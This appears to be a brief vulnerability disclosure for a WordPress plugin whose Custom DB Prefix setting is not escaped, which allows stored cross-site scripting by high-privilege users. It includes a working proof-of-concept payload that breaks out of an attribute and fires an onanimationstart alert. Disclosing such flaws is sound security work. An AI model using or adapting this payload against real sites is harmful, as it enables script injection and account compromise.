The plugin does not escape its Custom DB prefix settings, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed
Put the following payload in the Custom DB Prefix settings of the plugin: Books_n_Papers" style=animation-name:rotation onanimationstart=alert(/XSS/)//